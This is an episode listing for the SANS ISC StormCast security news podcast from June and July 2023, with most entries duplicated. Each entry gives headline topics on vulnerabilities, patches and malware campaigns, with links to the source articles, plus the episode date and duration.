USPS Phishing Scam Targeting iOS Users https://isc.sans.edu/forums/diary/USPS+Phishing+Scam+Targeting+iOS+Users/30078/ Do Attackers Pay More Attention to IPv6 https://isc.sans.edu/diary/Do%20Attackers%20Pay%20More%20Attention%20to%20IPv6%3F/30076 Shell Code in Images https://isc.sans.edu/diary/ShellCode%20Hidden%20with%20Steganography/30074 Ivanti Mobileiron Exploit Public https://github.com/vchan-in/CVE-2023-35078-Exploit-POC/blob/main/cve_2023_35078_poc.py
7/31/20235 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, July 31st, 2023

USPS Phishing Scam Targeting iOS Users https://isc.sans.edu/forums/diary/USPS+Phishing+Scam+Targeting+iOS+Users/30078/ Do Attackers Pay More Attention to IPv6 https://isc.sans.edu/diary/Do%20Attackers%20Pay%20More%20Attention%20to%20IPv6%3F/30076 Shell Code in Images https://isc.sans.edu/diary/ShellCode%20Hidden%20with%20Steganography/30074 Ivanti Mobileiron Exploit Public https://github.com/vchan-in/CVE-2023-35078-Exploit-POC/blob/main/cve_2023_35078_poc.py
7/31/20235 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, July 28th, 2023

Ubuntu OverlayFS Vulnerability https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability CISA Warns of Insecure Direct Option Reference Vulnerabilities https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-208a Sophos UTM Patch https://docs.sophos.com/releasenotes/index.html?productGroupID=nsg&productID=utm&versionID=9.7 Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-009.txt
7/28/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, July 28th, 2023

Ubuntu OverlayFS Vulnerability https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability CISA Warns of Insecure Direct Option Reference Vulnerabilities https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-208a Sophos UTM Patch https://docs.sophos.com/releasenotes/index.html?productGroupID=nsg&productID=utm&versionID=9.7 Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-009.txt
7/28/20235 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, July 27th, 2023

Suspicious IP Addresses Avoided By Malware Samples https://isc.sans.edu/diary/Suspicious%20IP%20Addresses%20Avoided%20by%20Malware%20Samples/30068 Messaging Layer Security (MLS) Protocol https://datatracker.ietf.org/doc/html/rfc9420 PySecDB: Security Commit Dataset in Python https://github.com/SunLab-GMU/PySecDB MacOS Infostealer https://www.sentinelone.com/blog/apple-crimeware-massive-rust-infostealer-campaign-aiming-for-macos-sonoma-ahead-of-public-release/
7/27/20235 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, July 27th, 2023

Suspicious IP Addresses Avoided By Malware Samples https://isc.sans.edu/diary/Suspicious%20IP%20Addresses%20Avoided%20by%20Malware%20Samples/30068 Messaging Layer Security (MLS) Protocol https://datatracker.ietf.org/doc/html/rfc9420 PySecDB: Security Commit Dataset in Python https://github.com/SunLab-GMU/PySecDB MacOS Infostealer https://www.sentinelone.com/blog/apple-crimeware-massive-rust-infostealer-campaign-aiming-for-macos-sonoma-ahead-of-public-release/
7/27/20235 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, July 26th, 2023

Ivanti Patches Endpoint Manager Mobile https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability?language=en_US Atlassian Patches https://confluence.atlassian.com/security/security-bulletin-july-18-2023-1251417643.html AMD Zen-2 Vulnerability https://lock.cmpxchg8b.com/zenbleed.html VMWare CVE-2023-20891 https://socradar.io/vmwares-response-to-the-critical-cve-2023-20891-vulnerability-exposing-cf-api-admin-credentials/
7/26/20235 minutes
Episode Artwork

ISC StormCast for Wednesday, July 26th, 2023

Ivanti Patches Endpoint Manager Mobile https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability?language=en_US Atlassian Patches https://confluence.atlassian.com/security/security-bulletin-july-18-2023-1251417643.html AMD Zen-2 Vulnerability https://lock.cmpxchg8b.com/zenbleed.html VMWare CVE-2023-20891 https://socradar.io/vmwares-response-to-the-critical-cve-2023-20891-vulnerability-exposing-cf-api-admin-credentials/
7/26/20235 minutes
Episode Artwork

ISC StormCast for Tuesday, July 25th, 2023

Apple Updates https://isc.sans.edu/forums/diary/Apple%20Updates%20Everything%20%28again%29/30062/ https://support.apple.com/en-us/HT201222 Parsing Data with jq https://isc.sans.edu/diary/JQ%3A%20Another%20Tool%20We%20Thought%20We%20Knew/30060 TETRA Radio Backdoor https://www.wired.com/story/tetra-radio-encryption-backdoor/
7/25/20236 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, July 25th, 2023

Apple Updates https://isc.sans.edu/forums/diary/Apple%20Updates%20Everything%20%28again%29/30062/ https://support.apple.com/en-us/HT201222 Parsing Data with jq https://isc.sans.edu/diary/JQ%3A%20Another%20Tool%20We%20Thought%20We%20Knew/30060 TETRA Radio Backdoor https://www.wired.com/story/tetra-radio-encryption-backdoor/
7/25/20236 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, July 24th, 2023

Shodan's API for the (Recon) Win! https://isc.sans.edu/diary/Shodan%27s%20API%20For%20The%20%28Recon%29%20Win!/30050 Stolen Microsoft Key May Have Opened Up a lot more than US Government E-Mail Inboxes https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr https://www.theregister.com/2023/07/21/microsoft_key_skeleton/ Okta Logs Decoded https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/ Threat Actors Exploiting Citrix CVE-2023-3519 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a https://github.com/securekomodo/citrixInspector
7/24/20236 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, July 24th, 2023

Shodan's API for the (Recon) Win! https://isc.sans.edu/diary/Shodan%27s%20API%20For%20The%20%28Recon%29%20Win!/30050 Stolen Microsoft Key May Have Opened Up a lot more than US Government E-Mail Inboxes https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr https://www.theregister.com/2023/07/21/microsoft_key_skeleton/ Okta Logs Decoded https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/ Threat Actors Exploiting Citrix CVE-2023-3519 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a https://github.com/securekomodo/citrixInspector
7/24/20236 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, July 21st, 2023

Deobfuscation of Malware Delivered Through a .bat File https://isc.sans.edu/diary/Deobfuscation%20of%20Malware%20Delivered%20Through%20a%20.bat%20File/30048 Citrix CVE-2023-3519 Indicators of Compromise https://www.deyda.net/index.php/en/2023/07/19/checklist-for-citrix-adc-cve-2023-3519/ ssh-agent vulnerability https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt Spring Security: WebFlux Security Bypass with Un-Prefixed Double Wildcard Pattern https://spring.io/security/cve-2023-34034 American Megatrends (AMI) MegaRAC BMC Vulnerabilities https://eclypsium.com/research/bmcc-lights-out-forever/
7/21/20233 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, July 21st, 2023

Deobfuscation of Malware Delivered Through a .bat File https://isc.sans.edu/diary/Deobfuscation%20of%20Malware%20Delivered%20Through%20a%20.bat%20File/30048 Citrix CVE-2023-3519 Indicators of Compromise https://www.deyda.net/index.php/en/2023/07/19/checklist-for-citrix-adc-cve-2023-3519/ ssh-agent vulnerability https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt Spring Security: WebFlux Security Bypass with Un-Prefixed Double Wildcard Pattern https://spring.io/security/cve-2023-34034 American Megatrends (AMI) MegaRAC BMC Vulnerabilities https://eclypsium.com/research/bmcc-lights-out-forever/
7/21/20233 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, July 20th, 2023

Citrix ADC Vulneraiblity CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 https://isc.sans.edu/forums/diary/Citrix%20ADC%20Vulnerability%20CVE-2023-3519%2C%203466%20and%203467%20-%20Patch%20Now!/30044/ HAM Radio Enigma Machine Challenge https://isc.sans.edu/diary/HAM%20Radio%20%2B%20Enigma%20Machine%20Challenge/30042 Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujul2023.html Microsoft Expanding Cloud Logging https://www.microsoft.com/en-us/security/blog/2023/07/19/expanding-cloud-logging-to-give-customers-deeper-security-visibility/
7/20/20233 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, July 20th, 2023

Citrix ADC Vulneraiblity CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 https://isc.sans.edu/forums/diary/Citrix%20ADC%20Vulnerability%20CVE-2023-3519%2C%203466%20and%203467%20-%20Patch%20Now!/30044/ HAM Radio Enigma Machine Challenge https://isc.sans.edu/diary/HAM%20Radio%20%2B%20Enigma%20Machine%20Challenge/30042 Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujul2023.html Microsoft Expanding Cloud Logging https://www.microsoft.com/en-us/security/blog/2023/07/19/expanding-cloud-logging-to-give-customers-deeper-security-visibility/
7/20/20233 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, July 19th, 2023

Exploit Attempts for "Stagil navigation for Jira Menus & Themes" https://isc.sans.edu/diary/Exploit%20Attempts%20for%20%22Stagil%20navigation%20for%20Jira%20Menus%20%26%20Themes%22%20CVE-2023-26255%20and%20CVE-2023-26256/30038 Citrix Vulnerabilities https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467 Google Cloud Build Service Vulnerability https://orca.security/resources/blog/bad-build-google-cloud-build-potential-supply-chain-attack-vulnerability
7/19/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, July 19th, 2023

Exploit Attempts for "Stagil navigation for Jira Menus & Themes" https://isc.sans.edu/diary/Exploit%20Attempts%20for%20%22Stagil%20navigation%20for%20Jira%20Menus%20%26%20Themes%22%20CVE-2023-26255%20and%20CVE-2023-26256/30038 Citrix Vulnerabilities https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467 Google Cloud Build Service Vulnerability https://orca.security/resources/blog/bad-build-google-cloud-build-potential-supply-chain-attack-vulnerability
7/19/20235 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, July 18th, 2023

Zimbra Vulnerability Exploited https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15 Woocommerce Vulnerability Actively Being Exploited https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/ Adobe Coldfusion Flaws exploited https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-rce-bug-exploited-in-attacks/ CISA Cloud Security Fact Sheet: Free Tools for Cloud Environments https://www.cisa.gov/sites/default/files/2023-07/Free%20Tools%20for%20Cloud%20Environments_508c.pdf JumpCloud Breach https://arstechnica.com/security/2023/07/jumpcloud-says-nation-state-hacker-breach-targeted-some-of-its-customers/
7/18/20235 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, July 18th, 2023

Zimbra Vulnerability Exploited https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15 Woocommerce Vulnerability Actively Being Exploited https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/ Adobe Coldfusion Flaws exploited https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-rce-bug-exploited-in-attacks/ CISA Cloud Security Fact Sheet: Free Tools for Cloud Environments https://www.cisa.gov/sites/default/files/2023-07/Free%20Tools%20for%20Cloud%20Environments_508c.pdf JumpCloud Breach https://arstechnica.com/security/2023/07/jumpcloud-says-nation-state-hacker-breach-targeted-some-of-its-customers/
7/18/20235 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, July 17th, 2023

Microsoft Driver Certs Details https://blog.talosintelligence.com/old-certificate-new-signature/ Threads App Lures https://www.helpnetsecurity.com/2023/07/14/threads-app-lure/ First Releases CVSS 4.0 Preview https://www.first.org/cvss/
7/17/20237 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, July 17th, 2023

Microsoft Driver Certs Details https://blog.talosintelligence.com/old-certificate-new-signature/ Threads App Lures https://www.helpnetsecurity.com/2023/07/14/threads-app-lure/ First Releases CVSS 4.0 Preview https://www.first.org/cvss/
7/17/20237 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, July 14th, 2023

DShield Honeypot Maintenance and Data Retention https://isc.sans.edu/diary/DShield%20Honeypot%20Maintenance%20and%20Data%20Retention/30024 Enhanced Monitoring to Detect APT Activity Targeting Outlook Online https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a PoC Exploit: Fake Proof of Concept with Backdoor Malware https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware GhostScript CVE-2023-36664 PoC Exploit https://www.kroll.com/en/insights/publications/cyber/ghostscript-cve-2023-36664-remote-code-execution-vulnerability
7/14/20235 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, July 14th, 2023

DShield Honeypot Maintenance and Data Retention https://isc.sans.edu/diary/DShield%20Honeypot%20Maintenance%20and%20Data%20Retention/30024 Enhanced Monitoring to Detect APT Activity Targeting Outlook Online https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a PoC Exploit: Fake Proof of Concept with Backdoor Malware https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware GhostScript CVE-2023-36664 PoC Exploit https://www.kroll.com/en/insights/publications/cyber/ghostscript-cve-2023-36664-remote-code-execution-vulnerability
7/14/20235 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, July 13th, 2023

Apple Re-Releases Rapid Security Update for iOS/MacOS https://support.apple.com/HT201224 Loader Activity For Formbook "QM18" https://isc.sans.edu/diary/Loader%20activity%20for%20Formbook%20%22QM18%22/30020 Adobe Patches https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html FortiOS/FortiProxy Stack Based Overflow https://www.fortiguard.com/psirt/FG-IR-23-183 Citrix Secure Access Client for Ubuntu https://support.citrix.com/article/CTX564169/citrix-secure-access-client-for-ubuntu-security-bulletin-for-cve202324492 Sonicwall Updates https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0010
7/13/20236 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, July 13th, 2023

Apple Re-Releases Rapid Security Update for iOS/MacOS https://support.apple.com/HT201224 Loader Activity For Formbook "QM18" https://isc.sans.edu/diary/Loader%20activity%20for%20Formbook%20%22QM18%22/30020 Adobe Patches https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html FortiOS/FortiProxy Stack Based Overflow https://www.fortiguard.com/psirt/FG-IR-23-183 Citrix Secure Access Client for Ubuntu https://support.citrix.com/article/CTX564169/citrix-secure-access-client-for-ubuntu-security-bulletin-for-cve202324492 Sonicwall Updates https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0010
7/13/20236 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, July 12th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/July%202023%20Microsoft%20Patch%20Update/30018/ https://blog.talosintelligence.com/old-certificate-new-signature/ Apple Withdraws Rapid Security Response Update https://support.apple.com/en-us/HT213827
7/12/20236 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, July 12th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/July%202023%20Microsoft%20Patch%20Update/30018/ https://blog.talosintelligence.com/old-certificate-new-signature/ Apple Withdraws Rapid Security Response Update https://support.apple.com/en-us/HT213827
7/12/20236 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, July 11th, 2023

Apple Rapid Security Update Patches Three Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Rapid%20Security%20Update%20Patches%20Three%20Exploited%20Vulnerabilities/30012 Ubiquity Edgerouter and AirCube miniupnpd Heap Overflow https://ssd-disclosure.com/ssd-advisory-edgerouters-and-aircube-miniupnpd-heap-overflow/ Mozilla Restricting Extensions on Quarantined Domains https://support.mozilla.org/en-US/kb/quarantined-domains https://www.mozilla.org/en-US/firefox/115.0/releasenotes/ https://lapcatsoftware.com/articles/2023/7/1.html
7/11/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, July 11th, 2023

Apple Rapid Security Update Patches Three Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Rapid%20Security%20Update%20Patches%20Three%20Exploited%20Vulnerabilities/30012 Ubiquity Edgerouter and AirCube miniupnpd Heap Overflow https://ssd-disclosure.com/ssd-advisory-edgerouters-and-aircube-miniupnpd-heap-overflow/ Mozilla Restricting Extensions on Quarantined Domains https://support.mozilla.org/en-US/kb/quarantined-domains https://www.mozilla.org/en-US/firefox/115.0/releasenotes/ https://lapcatsoftware.com/articles/2023/7/1.html
7/11/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, July 10th, 2023

DSSuite Didier Toolbox Cokcer Image Update https://isc.sans.edu/diary/DSSuite%20%28Didier%27s%20Toolbox%29%20Docker%20Image%20Update/30008 More MoveIT Flaws and new Service Pack https://community.progress.com/s/article/MOVEit-Transfer-2020-1-Service-Pack-July-2023 Cisco Nexus 9000 Flaw https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-cloudsec-enc-Vs5Wn2sX
7/10/20234 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, July 10th, 2023

DSSuite Didier Toolbox Cokcer Image Update https://isc.sans.edu/diary/DSSuite%20%28Didier%27s%20Toolbox%29%20Docker%20Image%20Update/30008 More MoveIT Flaws and new Service Pack https://community.progress.com/s/article/MOVEit-Transfer-2020-1-Service-Pack-July-2023 Cisco Nexus 9000 Flaw https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-cloudsec-enc-Vs5Wn2sX
7/10/20234 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, July 7th, 2023

IDS Comparisons with DShield Honeypot Data https://isc.sans.edu/diary/IDS%20Comparisons%20with%20DShield%20Honeypot%20Data/30002 Truebot Exploits Netwrix Auditor https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a Stackrot Linux Priviledge Escalation Vulnerability https://www.openwall.com/lists/oss-security/2023/07/05/1 TeamsPhisher Exploit https://github.com/Octoberfest7/TeamsPhisher VMWare Update https://www.vmware.com/security/advisories/VMSA-2023-0015.html
7/7/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, July 7th, 2023

IDS Comparisons with DShield Honeypot Data https://isc.sans.edu/diary/IDS%20Comparisons%20with%20DShield%20Honeypot%20Data/30002 Truebot Exploits Netwrix Auditor https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a Stackrot Linux Priviledge Escalation Vulnerability https://www.openwall.com/lists/oss-security/2023/07/05/1 TeamsPhisher Exploit https://github.com/Octoberfest7/TeamsPhisher VMWare Update https://www.vmware.com/security/advisories/VMSA-2023-0015.html
7/7/20235 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, July 6th, 2023

DShield pfSense Client Update https://isc.sans.edu/diary/DShield%20pfSense%20Client%20Update/29994 Exposed Industrial Control Systems https://isc.sans.edu/diary/Controlling%20network%20access%20to%20ICS%20systems/30000 Analysis Method for Custom Encoding https://isc.sans.edu/diary/Analysis%20Method%20for%20Custom%20Encoding/29946 SNAPPY: Detecting Rogue WiFi Access Points https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/snappy-detecting-rogue-and-fake-80211-wireless-access-points-through-fingerprinting-beacon-management-frames/ RUSTBUCKET Mac Malware https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
7/6/20236 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, July 6th, 2023

DShield pfSense Client Update https://isc.sans.edu/diary/DShield%20pfSense%20Client%20Update/29994 Exposed Industrial Control Systems https://isc.sans.edu/diary/Controlling%20network%20access%20to%20ICS%20systems/30000 Analysis Method for Custom Encoding https://isc.sans.edu/diary/Analysis%20Method%20for%20Custom%20Encoding/29946 SNAPPY: Detecting Rogue WiFi Access Points https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/snappy-detecting-rogue-and-fake-80211-wireless-access-points-through-fingerprinting-beacon-management-frames/ RUSTBUCKET Mac Malware https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
7/6/20236 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, June 30th, 2023

GuLoader or BatLoader/Modiloader infection fro Remcos RAT https://isc.sans.edu/diary/GuLoader-%20or%20DBatLoader%20ModiLoader-style%20infection%20for%20Remcos%20RAT/29990 CVE-2023-26258 Remote Code Execution in Arcserve UDP Backup https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/ Sysmon Update https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36 Drone Security and Fault Injection Attacks https://labs.ioactive.com/2023/06/applying-fault-injection-to-firmware.html
6/30/20236 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, June 30th, 2023

GuLoader or BatLoader/Modiloader infection fro Remcos RAT https://isc.sans.edu/diary/GuLoader-%20or%20DBatLoader%20ModiLoader-style%20infection%20for%20Remcos%20RAT/29990 CVE-2023-26258 Remote Code Execution in Arcserve UDP Backup https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/ Sysmon Update https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36 Drone Security and Fault Injection Attacks https://labs.ioactive.com/2023/06/applying-fault-injection-to-firmware.html
6/30/20236 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, June 29th, 2023

Kazkhastan: The world's last SSLv2 Super Power https://isc.sans.edu/diary/Kazakhstan%20-%20the%20world%27s%20last%20SSLv2%20superpower...%20and%20a%20country%20with%20potentially%20vulnerable%20last-mile%20internet%20infrastructure/29988 npm manifest issues https://blog.vlt.sh/blog/the-massive-hole-in-the-npm-ecosystem Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution
6/29/20235 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, June 29th, 2023

Kazkhastan: The world's last SSLv2 Super Power https://isc.sans.edu/diary/Kazakhstan%20-%20the%20world%27s%20last%20SSLv2%20superpower...%20and%20a%20country%20with%20potentially%20vulnerable%20last-mile%20internet%20infrastructure/29988 npm manifest issues https://blog.vlt.sh/blog/the-massive-hole-in-the-npm-ecosystem Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution
6/29/20235 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, June 28th, 2023

The Importance of Malware Triage https://isc.sans.edu/diary/The+Importance+of+Malware+Triage/29984/ RowPress: Amplifying Read Disturbance in Modern DRAM Chips https://dl.acm.org/doi/abs/10.1145/3579371.3589063 Dell BIOS Updates https://www.dell.com/support/kbdoc/de-de/000214778/dsa-2023-174-dell-client-bios-security-update-for-an-out-of-bounds-write-vulnerability Google Chrome Update https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop_26.html
6/28/20235 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, June 28th, 2023

The Importance of Malware Triage https://isc.sans.edu/diary/The+Importance+of+Malware+Triage/29984/ RowPress: Amplifying Read Disturbance in Modern DRAM Chips https://dl.acm.org/doi/abs/10.1145/3579371.3589063 Dell BIOS Updates https://www.dell.com/support/kbdoc/de-de/000214778/dsa-2023-174-dell-client-bios-security-update-for-an-out-of-bounds-write-vulnerability Google Chrome Update https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop_26.html
6/28/20235 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, June 27th, 2023

BlackLotus Mitigation Guide https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF Camaro Dragon Infects USB Drives as well as Network Drives https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ Grafana Security Release https://grafana.com/blog/2023/06/22/grafana-security-release-for-cve-2023-3128/
6/27/20235 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, June 27th, 2023

BlackLotus Mitigation Guide https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF Camaro Dragon Infects USB Drives as well as Network Drives https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ Grafana Security Release https://grafana.com/blog/2023/06/22/grafana-security-release-for-cve-2023-3128/
6/27/20235 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, June 26th, 2023

Email Spam With Modiloader Attached https://isc.sans.edu/diary/Email%20Spam%20with%20Attachment%20Modiloader/29978 Word Document with an Online Attached Template https://isc.sans.edu/diary/Word%20Document%20with%20an%20Online%20Attached%20Template/29976 Quakbot Activity Obama271 Distrubution Tag https://isc.sans.edu/diary/Qakbot%20%28Qbot%29%20activity%2C%20obama271%20distribution%20tag/29968 Microsoft Teams External Tenant Confusion https://labs.jumpsec.com/advisory-idor-in-microsoft-teams-allows-for-external-tenants-to-introduce-malware/ Free Smart Watches https://www.darkreading.com/threat-intelligence/suspicious-smartwatches-mailed-us-army-personnel
6/26/20236 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, June 26th, 2023

Email Spam With Modiloader Attached https://isc.sans.edu/diary/Email%20Spam%20with%20Attachment%20Modiloader/29978 Word Document with an Online Attached Template https://isc.sans.edu/diary/Word%20Document%20with%20an%20Online%20Attached%20Template/29976 Quakbot Activity Obama271 Distrubution Tag https://isc.sans.edu/diary/Qakbot%20%28Qbot%29%20activity%2C%20obama271%20distribution%20tag/29968 Microsoft Teams External Tenant Confusion https://labs.jumpsec.com/advisory-idor-in-microsoft-teams-allows-for-external-tenants-to-introduce-malware/ Free Smart Watches https://www.darkreading.com/threat-intelligence/suspicious-smartwatches-mailed-us-army-personnel
6/26/20236 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, June 23rd, 2023

Apple Updates Already Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Patches%20Exploited%20Vulnerabilities%20in%20iOS%20iPadOS%2C%20macOS%2C%20watchOS%20and%20Safari/29972 Heap Buffer Overflow in VMWare VCenter https://www.vmware.com/security/advisories/VMSA-2023-0014.html GitHub RepoJacking https://blog.aquasec.com/github-dataset-research-reveals-millions-potentially-vulnerable-to-repojacking
6/23/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, June 23rd, 2023

Apple Updates Already Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Patches%20Exploited%20Vulnerabilities%20in%20iOS%20iPadOS%2C%20macOS%2C%20watchOS%20and%20Safari/29972 Heap Buffer Overflow in VMWare VCenter https://www.vmware.com/security/advisories/VMSA-2023-0014.html GitHub RepoJacking https://blog.aquasec.com/github-dataset-research-reveals-millions-potentially-vulnerable-to-repojacking
6/23/20235 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, June 22nd, 2023

Analyzing a YouTube Sponsorship Phishing E-Mail https://isc.sans.edu/diary/Analyzing%20a%20YouTube%20Sponsorship%20Phishing%20Mail%20and%20Malware%20Targeting%20Content%20Creators/29966 Malicious Code Can Be Anywhere https://isc.sans.edu/diary/Malicious%20Code%20Can%20Be%20Anywhere/29964 Zyxel Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-pre-authentication-command-injection-vulnerability-in-nas-products Huawei Vulnerability https://www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-thvihr-7015cbae-en Asus Vulnerability https://www.asus.com/content/asus-product-security-advisory/ VMWare Aria Vuln Exploited https://www.vmware.com/security/advisories/VMSA-2023-0012.html
6/22/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, June 22nd, 2023

Analyzing a YouTube Sponsorship Phishing E-Mail https://isc.sans.edu/diary/Analyzing%20a%20YouTube%20Sponsorship%20Phishing%20Mail%20and%20Malware%20Targeting%20Content%20Creators/29966 Malicious Code Can Be Anywhere https://isc.sans.edu/diary/Malicious%20Code%20Can%20Be%20Anywhere/29964 Zyxel Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-pre-authentication-command-injection-vulnerability-in-nas-products Huawei Vulnerability https://www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-thvihr-7015cbae-en Asus Vulnerability https://www.asus.com/content/asus-product-security-advisory/ VMWare Aria Vuln Exploited https://www.vmware.com/security/advisories/VMSA-2023-0012.html
6/22/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, June 20th, 2023

